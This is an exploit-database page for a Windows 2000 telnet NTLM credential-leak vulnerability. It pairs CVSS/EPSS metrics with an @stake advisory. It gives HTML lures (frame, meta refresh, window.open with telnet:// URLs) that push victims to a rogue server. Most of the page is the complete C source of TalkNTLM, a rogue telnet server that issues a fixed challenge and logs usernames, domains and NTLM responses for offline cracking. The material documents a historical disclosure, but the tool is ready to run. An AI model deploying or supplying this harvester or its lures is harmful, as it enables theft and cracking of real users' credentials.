Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date EPSS V0 EPSS V1 EPSS V2 (> 2022-02-04) EPSS V3 (> 2025-03-07) EPSS V4 (> 2025-03-17) 2022-02-06 – – 25.6% – – 2022-04-03 – – 25.6% – – 2023-03-12 – – – 2.67% – 2024-02-11 – – – 2.67% – 2024-06-02 – – – 2.67% – 2024-06-30 – – – 2.67% – 2024-08-04 – – – 2.67% – 2024-08-11 – – – 2.67% – 2024-12-22 – – – 2.03% – 2025-01-19 – – – 2.03% – 2025-03-18 – – – – 18.36% 2025-03-18 – – – – 18.36%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date Percentile 2022-02-06 96% 2022-04-03 97% 2023-03-12 89% 2024-02-11 9% 2024-06-02 9% 2024-06-30 91% 2024-08-04 9% 2024-08-11 91% 2024-12-22 89% 2025-01-19 89% 2025-03-18 95% 2025-03-18 95%
Informations sur l'Exploit
Exploit Database EDB-ID : 20222
Date de publication : 2000-08-13 22h00 +00:00
Auteur : @stake
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/1683/info
By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 utilizes Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client will attempt authentication via NTLM, regardless of whether the host is a Windows telnet server. There is a possibility that the NTLM challenge/response authentication session could be monitored and subsequently cracked, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated in the tool "L0phtcrack." Note that a rogue server also chooses the challenge: the listing below sends the fixed value FF FF FF FF FF FF FF FF to every client, so the captured responses can be attacked with tables precomputed for that one challenge instead of a fresh brute force per capture.
Forcing a telnet session on a remote target is a trivial task because products such as Microsoft Internet Explorer, Outlook (Express), Netscape Navigator, etc. will automatically open URLs with a "telnet://" prefix in a default telnet client (which is normally telnet.exe). The following are some examples of how one could open a telnet session on a specified rogue server:
1) frame src=telnet://target
2) meta http-equiv="refresh" content="0;URL=telnet://telnet-attacker"
3) window.open("telnet://target")
/* TalkNTLM - NTLM Logging Telnet Server
* dildog@atstake.com
* 8/14/00
* Copyright (C) 2000 @stake, Inc.
*/
#include<stdio.h>
#include<string.h>
#include<unistd.h>
#include<stdlib.h>
#include<ctype.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<sys/wait.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#define MAJOR_VERSION 1
#define MINOR_VERSION 0
/* Telnet command bytes: each is sent as IAC followed by the command byte. */
#define IAC 255 /* interpret as command: */
#define DONT 254 /* you are not to use option */
#define DO 253 /* please, you use option */
#define WONT 252 /* I won't use option */
#define WILL 251 /* I will use option */
#define SB 250 /* interpret as subnegotiation */
#define SE 240 /* end sub negotiation */
/* Telnet AUTHENTICATION option and the sub-negotiation commands used below. */
#define AUTH 37 /* option code negotiated with DO/WILL */
#define IS 0 /* client -> server: "here is my authentication data" */
#define SEND 1 /* server -> client: "these are the methods I accept" */
#define REPLY 2 /* server -> client: answer to the client's IS */
#define NAME 3 /* defined for completeness; not used in this file */
#define NTLM 15 /* authentication type offered by SEND / carried by IS and REPLY */
#define ACCEPT 1 /* REPLY modifier: server accepts and continues the exchange */
/* Top-level operating mode chosen on the command line (-t). */
typedef enum {
    METHOD_NONE = 0,  /* nothing selected yet: main() falls through to usage() */
    METHOD_TELNET = 1 /* act as a telnet server */
} METHOD;
/* What to do with the telnet session once it is established (-l). */
typedef enum {
    SUBMETHOD_NONE = 0, /* nothing selected yet: main() falls through to usage() */
    SUBMETHOD_LOG = 1   /* capture the NTLM challenge/response into a log file */
} SUBMETHOD;
#define COMMSOCK_BUFSIZ 2048
/* The accepted connection wrapped as a stdio stream by do_telnet_log()
 * (fdopen); every getb()/putb() helper below reads or writes through it. */
FILE *g_fCommSock;
/* Buffer handed to setvbuf() for g_fCommSock: the stream is fully buffered,
 * so output only leaves the process when putflush() is called. */
char g_CommSockBuf[COMMSOCK_BUFSIZ];
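/* Print a diagnostic on stderr.  stdout is flushed first so the message
 * lands after anything already printed on the normal channel.
 *
 * str: message text, written verbatim.  It is deliberately not used as a
 *      printf format: a '%' in the text must never be interpreted as a
 *      conversion (CERT FIO30-C). */
void error(const char *str)
{
    fflush(stdout);
    fputs(str, stderr);
    fflush(stderr);
}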
/* Read one byte from the connection stream g_fCommSock.
 * Returns the byte, or 0 when fread() delivers nothing (EOF or error);
 * callers cannot tell a real 0x00 from end of stream, they rely on the
 * telnet framing checks (IAC ... SE) failing afterwards. */
unsigned char getb(void)
{
    unsigned char byte = 0;
    if (fread(&byte, 1, 1, g_fCommSock) != 1) {
        byte = 0;
    }
    return byte;
}
/* Read a 16-bit little-endian value from g_fCommSock: low byte first. */
unsigned short getdwl(void)
{
    unsigned short lo = getb();
    unsigned short hi = getb();
    return (unsigned short)(lo | (hi << 8));
}
/* Read a 32-bit little-endian value from g_fCommSock: least significant
 * byte first.  Only the low 32 bits of the result are ever set. */
unsigned long getddl(void)
{
    unsigned long value = 0;
    int shift;
    for (shift = 0; shift < 32; shift += 8) {
        value |= ((unsigned long)getb()) << shift;
    }
    return value;
}
/* Queue one byte on g_fCommSock.  The stream is fully buffered: nothing
 * reaches the client until putflush(). */
void putb(unsigned char c)
{
    fputc(c, g_fCommSock);
}
/* Queue a 16-bit value in little-endian order (low byte first). */
void putdwl(unsigned short w)
{
    int i;
    for (i = 0; i < 2; i++) {
        putb((unsigned char)((w >> (8 * i)) & 0xFF));
    }
}
/* Queue the low 32 bits of d in little-endian order (low byte first). */
void putddl(unsigned long d)
{
    int i;
    for (i = 0; i < 4; i++) {
        putb((unsigned char)((d >> (8 * i)) & 0xFF));
    }
}
/* Queue the first n bytes of b, in order.  A non-positive n sends nothing. */
void putarrb(int n, unsigned char *b)
{
    unsigned char *end = b + n;
    while (b < end) {
        putb(*b++);
    }
}
/* Queue the first n bytes of c as raw bytes.  The length is explicit, so
 * embedded NULs are sent too (the callers rely on this for UTF-16 data). */
void putarrc(int n, char *c)
{
    int i;
    for (i = 0; i < n; i++) {
        putb((unsigned char)c[i]);
    }
}
/* Push everything queued by the put*() helpers out to the client.  The
 * fflush() result is ignored, as in the rest of the listing. */
void putflush(void)
{
    (void)fflush(g_fCommSock);
}
/* Debug helper (currently only referenced from commented-out code): dump
 * one byte on stderr as decimal, hex and, if alphanumeric, as a character. */
void debugb(unsigned char c)
{
    int shown = isalnum(c) ? c : ' ';
    fprintf(stderr, "%d\t\t%X\t'%c'\n\r", c, c, shown);
}
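/* Listen on `port` (all interfaces), accept exactly one TCP connection and
 * return its socket.  The listening socket is closed before returning, so
 * each call serves a single client; do_telnet_log() calls this in a loop.
 *
 * port:   TCP port to bind, 1..65535.  Anything else is rejected here
 *         rather than silently truncated by htons() (e.g. 70000 -> 4464).
 * rsaddr: receives the peer address of the accepted connection.
 * Returns the accepted socket (>= 0) or a negative code: -1 bad port or
 * socket() failed, -2 setsockopt, -3 bind, -4 listen, -5 accept. */
int listenport(int port, struct sockaddr_in *rsaddr)
{
    if (port < 1 || port > 65535) {
        error("port must be between 1 and 65535.\n");
        return -1;
    }

    int s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        error("couldn't create socket.\n");
        return -1;
    }

    /* Allow an immediate re-bind of the same port on the next call. */
    int reuse = 1;
    if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof reuse) < 0) {
        error("couldn't set socket option.\n");
        close(s);
        return -2;
    }

    struct sockaddr_in saddr;
    memset(&saddr, 0, sizeof saddr);
    saddr.sin_family = AF_INET;
    saddr.sin_addr.s_addr = htonl(INADDR_ANY); /* every interface, as before */
    saddr.sin_port = htons((unsigned short)port);
    if (bind(s, (struct sockaddr *)&saddr, sizeof saddr) < 0) {
        error("couldn't bind.\n");
        close(s);
        return -3;
    }

    /* Backlog of one: only a single client is served per call. */
    if (listen(s, 1) < 0) {
        error("couldn't listen.\n");
        close(s);
        return -4;
    }

    socklen_t socklen = sizeof *rsaddr;
    memset(rsaddr, 0, sizeof *rsaddr);
    int as = accept(s, (struct sockaddr *)rsaddr, &socklen);
    if (as < 0) {
        error("couldn't accept.\n");
        close(s);
        return -5;
    }

    close(s);
    return as;
}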
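/* Largest NTLM sub-negotiation payload accepted from the client, counting
 * the 4-byte prefix that precedes the NTLMSSP message on the wire (the
 * same 2048-byte cap the original listing used). */
enum { MAX_NTLM_PAYLOAD = 2048 };

/* Read n bytes from the client and require them to equal `expected`.
 * Returns 1 on a full match, 0 at the first mismatch (EOF shows up as
 * 0x00 from getb() and therefore also fails). */
static int expect_bytes(const unsigned char *expected, int n)
{
    int i;
    for (i = 0; i < n; i++) {
        if (getb() != expected[i]) {
            return 0;
        }
    }
    return 1;
}

/* Read one NTLM sub-negotiation payload: a 32-bit little-endian length,
 * then that many bytes plus 4 (the prefix the client sends ahead of the
 * NTLMSSP blob, so the blob itself starts at (*buf)[4]).
 *
 * buf/len: on success receive a malloc'd copy and its total size; the
 *          caller frees it.
 * minsize: smallest acceptable total size (64 for the Type 3 message, so
 *          every fixed descriptor index read by take_field() is inside
 *          the buffer).
 * Returns 1 on success, 0 if the length is out of range or malloc fails. */
static int read_ntlm_payload(unsigned char **buf, int *len, int minsize)
{
    unsigned long declared = getddl();
    unsigned char *p;
    int size, i;

    /* The length is client-controlled: bound it before it reaches malloc
     * and before the "+ 4" can wrap. */
    if (declared > (unsigned long)(MAX_NTLM_PAYLOAD - 4)) {
        return 0;
    }
    size = (int)declared + 4;
    if (size < minsize) {
        return 0;
    }
    p = malloc((size_t)size);
    if (p == NULL) {
        return 0;
    }
    for (i = 0; i < size; i++) {
        p[i] = getb();
    }
    *buf = p;
    *len = size;
    return 1;
}

/* Send the NTLM Type 2 (challenge) message inside a telnet
 * AUTH REPLY NTLM ACCEPT sub-negotiation and flush it.  The byte layout is
 * exactly the one from the original listing: a 4-byte length (0xA8 = 168),
 * a 4-byte 0x2, then the 168-byte NTLMSSP blob whose target name sits at
 * offset 48 (right after the fixed header) and whose target-info block of
 * four dummy AV pairs sits at offset 68. */
static void send_ntlm_challenge(unsigned char *challenge)
{
    static const unsigned char avtypes[4] = { 0x2, 0x1, 0x4, 0x3 };
    int i;

    putb(IAC);
    putb(SB);
    putb(AUTH);
    putb(REPLY);
    putb(NTLM);
    putb(0);
    putb(ACCEPT);
    putddl(0xA8);                 /* length of everything after the next word */
    putddl(0x2);
    putarrc(8, "NTLMSSP");        /* signature incl. its NUL terminator */
    putddl(0x2);                  /* message type 2 */
    putdwl(0x14);                 /* target name: 20 bytes ... */
    putdwl(0x14);
    putddl(0x30);                 /* ... at offset 48 */
    putddl(0xE0828295);           /* flags word, kept verbatim from the listing */
    putarrb(8, challenge);
    putarrc(8, "\0\0\0\0\0\0\0\0"); /* 8-byte context, all zero */
    putdwl(0x64);                 /* target info: 100 bytes ... */
    putdwl(0x64);
    putddl(0x44);                 /* ... at offset 68 */
    putarrc(20, "A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); /* target name, UTF-16 "ABCDEFGHIJ" */
    /* Four AV pairs (types 2,1,4,3), each 20 bytes of the same dummy name. */
    for (i = 0; i < 4; i++) {
        putdwl(avtypes[i]);
        putdwl(0x14);
        putarrc(20, "A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0");
    }
    putddl(0);                    /* AV-pair list terminator */
    putb(IAC);
    putb(SE);
    putflush();
}

/* Copy one security-buffer field out of the Type 3 message held in resp.
 * lenpos is the index of the field's 16-bit length and offpos that of its
 * 32-bit offset, both as indices into resp (NTLMSSP offset + 4); the data
 * itself lives at resp[offset + 4].  Both numbers come from the client, so
 * they are checked against size before anything is copied -- the original
 * code used them unchecked, letting a hostile client make memcpy read far
 * past the 2048-byte buffer.
 *
 * Callers pass lenpos/offpos no larger than 0x2C and guarantee size >= 64.
 * Returns a malloc'd copy, NUL-terminated for convenience (*outlen is the
 * field length without the NUL), or NULL if the descriptor points outside
 * the buffer or malloc fails. */
static unsigned char *take_field(const unsigned char *resp, int size,
                                 int lenpos, int offpos, int *outlen)
{
    unsigned long len, off;
    unsigned char *copy;

    if (size < 4 || offpos + 3 >= size || lenpos + 1 >= size) {
        return NULL;
    }
    len = (unsigned long)resp[lenpos] |
          ((unsigned long)resp[lenpos + 1] << 8);
    off = (unsigned long)resp[offpos] |
          ((unsigned long)resp[offpos + 1] << 8) |
          ((unsigned long)resp[offpos + 2] << 16) |
          ((unsigned long)resp[offpos + 3] << 24);

    /* Together these mean off + 4 + len <= size, evaluated without any
     * intermediate overflow. */
    if (off > (unsigned long)size - 4 || len > (unsigned long)size - 4 - off) {
        return NULL;
    }
    copy = malloc((size_t)len + 1);
    if (copy == NULL) {
        return NULL;
    }
    memcpy(copy, resp + off + 4, (size_t)len);
    copy[len] = 0;
    *outlen = (int)len;
    return copy;
}

/* Print a UTF-16LE field as ASCII (every other byte) on stdout after
 * `label`, and append the same characters plus a ':' separator to lf. */
static void log_utf16_field(FILE *lf, const char *label,
                            const unsigned char *data, int len)
{
    int i;
    printf("%s", label);
    for (i = 0; i < len; i += 2) {
        printf("%c", data[i]);
        fprintf(lf, "%c", data[i]);
    }
    printf("\n");
    fprintf(lf, ":");
}

/* Print a binary field as hex on stdout (8 bytes per row, after a line
 * holding `label`) and append it to lf as one unbroken hex string.  The
 * caller writes whatever separator follows it in the log. */
static void log_hex_field(FILE *lf, const char *label,
                          const unsigned char *data, int len)
{
    int i;
    printf("%s\n", label);
    for (i = 0; i < len; i++) {
        printf("%2.2X ", data[i]);
        fprintf(lf, "%2.2X", data[i]);
        if (i % 8 == 7) {
            printf("\n");
        }
    }
    printf("\n");
}

/* Serve telnet clients forever, one at a time: accept a connection, drive
 * the telnet AUTHENTICATION option to an NTLM exchange, send a fixed
 * challenge and append the client's Type 3 response to the log.
 *
 * port:    TCP port to listen on (validated by listenport()).
 * logfile: opened in append mode once per connection; each capture adds
 *          one line "user:domain:challenge:resp1:resp2" with the three
 *          binary fields in hex.
 * Returns only on error: -1 listen/accept failed, -2 fdopen failed,
 * -3 log file could not be opened, -5 the client did not follow the
 * expected negotiation or sent a malformed/oversized NTLM message. */
int do_telnet_log(int port, char *logfile)
{
    static const unsigned char iac_will_auth[3] = { IAC, WILL, AUTH };
    static const unsigned char is_ntlm_type1[7] = { IAC, SB, AUTH, IS, NTLM, 0, 0 };
    static const unsigned char is_ntlm_type3[7] = { IAC, SB, AUTH, IS, NTLM, 0, 2 };
    static const unsigned char iac_se[2] = { IAC, SE };
    /* Fixed challenge: every client gets the same 8 bytes (also written to
     * the log), so one precomputed table serves every captured response. */
    unsigned char challenge[8] = { 255, 255, 255, 255, 255, 255, 255, 255 };
    FILE *lf = NULL;
    /* Everything below is function-scoped so the failure label can free it. */
    unsigned char *respbuf = NULL;
    unsigned char *username = NULL, *domainname = NULL;
    unsigned char *ntresp = NULL, *lmresp = NULL;
    int size = 0, usernamelen = 0, domainnamelen = 0, ntresplen = 0, lmresplen = 0;

    while (1) {
        struct sockaddr_in saddr;
        int s;

        printf("listening on port %d.\n", port);
        if ((s = listenport(port, &saddr)) < 0) {
            error("telnet logging abort.\n");
            return -1;
        }
        printf("recieved telnet connection from %s:%u.\n",
               inet_ntoa(saddr.sin_addr), ntohs(saddr.sin_port));

        /* All getb()/putb() helpers go through this fully buffered stream. */
        g_fCommSock = fdopen(s, "r+b");
        if (g_fCommSock == NULL) {
            error("couldn't fdopen comm socket.\n");
            close(s);
            return -2;
        }
        setvbuf(g_fCommSock, g_CommSockBuf, _IOFBF, COMMSOCK_BUFSIZ);

        lf = fopen(logfile, "a+t");
        if (lf == NULL) {
            error("couldn't open log file.\n");
            fclose(g_fCommSock);
            return -3;
        }

        /* 1. Ask the client to authenticate; it must answer WILL AUTH. */
        putb(IAC);
        putb(DO);
        putb(AUTH);
        putflush();
        printf(">> IAC DO AUTH\n");
        if (!expect_bytes(iac_will_auth, 3)) {
            goto telnetlogfail;
        }
        printf("<< IAC WILL AUTH\n");

        /* 2. Offer NTLM as the only authentication type. */
        putb(IAC);
        putb(SB);
        putb(AUTH);
        putb(SEND);
        putb(NTLM);
        putb(0);
        putb(IAC);
        putb(SE);
        putflush();
        printf(">> IAC SB AUTH SEND NTLM 0 IAC SE\n");

        /* 3. Type 1 (negotiate) message: read and discard, only the
         *    framing is checked. */
        if (!expect_bytes(is_ntlm_type1, 7)) {
            goto telnetlogfail;
        }
        if (!read_ntlm_payload(&respbuf, &size, 0)) {
            goto telnetlogfail;
        }
        free(respbuf);
        respbuf = NULL;
        if (!expect_bytes(iac_se, 2)) {
            goto telnetlogfail;
        }
        printf("<< IAC SB AUTH IS NTLM 0 0 ... IAC SE\n");

        /* 4. Type 2: our fixed challenge. */
        send_ntlm_challenge(challenge);
        printf(">> IAC SB AUTH REPLY NTLM 0 1 ... challenge ... IAC SE\n");

        /* 5. Type 3 (authenticate) message; at least 64 bytes so the
         *    descriptor indices used below are all inside respbuf. */
        if (!expect_bytes(is_ntlm_type3, 7)) {
            goto telnetlogfail;
        }
        if (!read_ntlm_payload(&respbuf, &size, 64)) {
            goto telnetlogfail;
        }
        if (!expect_bytes(iac_se, 2)) {
            goto telnetlogfail;
        }
        printf("<< IAC SB AUTH IS NTLM 0 2 ... response ... IAC SE\n");

        /* Pull the four fields out, each bounds-checked against size.
         * NOTE(review): the descriptor read as "NT Response" is at NTLMSSP
         * offset 0x0C and the one read as "LM Response" at 0x14; in the
         * published Type 3 layout those are the LM and NT response buffers
         * respectively, so the two labels (and the order of the last two log
         * columns) may be swapped -- verify against a real capture before
         * depending on the column order.  The offsets and log order are
         * kept exactly as in the original listing. */
        username   = take_field(respbuf, size, 0x28, 0x2C, &usernamelen);
        domainname = take_field(respbuf, size, 0x20, 0x24, &domainnamelen);
        ntresp     = take_field(respbuf, size, 0x10, 0x14, &ntresplen);
        lmresp     = take_field(respbuf, size, 0x18, 0x1C, &lmresplen);
        if (!username || !domainname || !ntresp || !lmresp) {
            goto telnetlogfail;
        }

        /* Log line: user:domain:challenge:resp1:resp2, then newline.  The
         * domain column is now written from domainname; the original wrote
         * it from username after that buffer had already been freed. */
        log_utf16_field(lf, "Username: ", username, usernamelen);
        log_utf16_field(lf, "Domain: ", domainname, domainnamelen);
        fprintf(lf, "%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X:",
                challenge[0], challenge[1], challenge[2], challenge[3],
                challenge[4], challenge[5], challenge[6], challenge[7]);
        log_hex_field(lf, "NT Response:", ntresp, ntresplen);
        fprintf(lf, ":");
        log_hex_field(lf, "LM Response:", lmresp, lmresplen);
        fprintf(lf, "\n");

        free(username);
        username = NULL;
        free(domainname);
        domainname = NULL;
        free(ntresp);
        ntresp = NULL;
        free(lmresp);
        lmresp = NULL;
        free(respbuf);
        respbuf = NULL;
        fclose(lf);
        lf = NULL;

        /* Close the telnet session and go back to listening. */
        fclose(g_fCommSock);
        g_fCommSock = NULL;
        printf("closed telnet socket.\n");
    }
    return 0;

telnetlogfail:
    /* Every pointer is NULL or owned here; free(NULL) is a no-op. */
    free(username);
    free(domainname);
    free(ntresp);
    free(lmresp);
    free(respbuf);
    if (lf != NULL) {
        fclose(lf);
    }
    printf("telnet negotiation failed.\n");
    fclose(g_fCommSock);
    return -5;
}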
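/* Print the banner and usage line, then terminate the process.
 *
 * progname: argv[0], shown in the banner line.
 * exitcode: passed straight to exit().  Callers use small negative numbers;
 *           on POSIX the shell only sees the low 8 bits (254, 253, ...). */
void usage(char *progname, int exitcode)
{
    printf("talkntlm v%d.%d (%s)\n", MAJOR_VERSION, MINOR_VERSION, progname);
    /* The usage text has no conversion for progname, so it is not passed
     * (the original handed it over as a stray, unused printf argument). */
    printf("usage: talkntlm -t [-p <port>] -l <challenge response logfile>\n");
    exit(exitcode);
}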
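/* Entry point: parse the command line and dispatch to the selected mode.
 *   -t          telnet mode (the only method); port defaults to 23
 *   -p <port>   listen on this port instead (1..65535)
 *   -l <file>   append captured challenge/response lines to <file>
 * Returns 0 when do_telnet_log() returns 0, -8 if it fails; option errors
 * leave through usage(), which exits with a small negative code. */
int main(int argc, char *argv[])
{
    int opt_port = 0;
    char *opt_logfile = NULL;
    METHOD opt_method = METHOD_NONE;
    SUBMETHOD opt_submethod = SUBMETHOD_NONE;
    int oc;

    /* getopt() returns int and ends with -1; the original stored it in a
     * plain char and looped while > 0, which never terminates where char
     * is unsigned (-1 becomes 255). */
    while ((oc = getopt(argc, argv, "l:p:t")) != -1) {
        switch (oc) {
        case 't':
            opt_method = METHOD_TELNET;
            if (opt_port == 0) {
                opt_port = 23; /* default unless -p was given first */
            }
            break;
        case 'p': {
            /* strtol instead of atoi so junk or out-of-range values are
             * rejected rather than silently becoming port 0 or truncated. */
            char *end = NULL;
            long v = strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0' || v < 1 || v > 65535) {
                usage(argv[0], -6);
            }
            opt_port = (int)v;
            break;
        }
        case 'l':
            if (opt_submethod != SUBMETHOD_NONE) {
                usage(argv[0], -2); /* -l given more than once */
            }
            opt_logfile = optarg;
            opt_submethod = SUBMETHOD_LOG;
            break;
        default:
            usage(argv[0], -3);
            break;
        }
    }

    /* Dispatch on method, then sub-method. */
    if (opt_method == METHOD_NONE) {
        usage(argv[0], -4);
    } else if (opt_method == METHOD_TELNET) {
        if (opt_submethod == SUBMETHOD_NONE) {
            usage(argv[0], -5);
        } else if (opt_submethod == SUBMETHOD_LOG) {
            if (opt_logfile == NULL) {
                usage(argv[0], -7);
            }
            if (do_telnet_log(opt_port, opt_logfile) != 0) {
                return -8;
            }
        }
    }
    return 0;
}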
Products Mentioned
Configuration 0 Microsoft>>Windows_2000 >> Version *
Références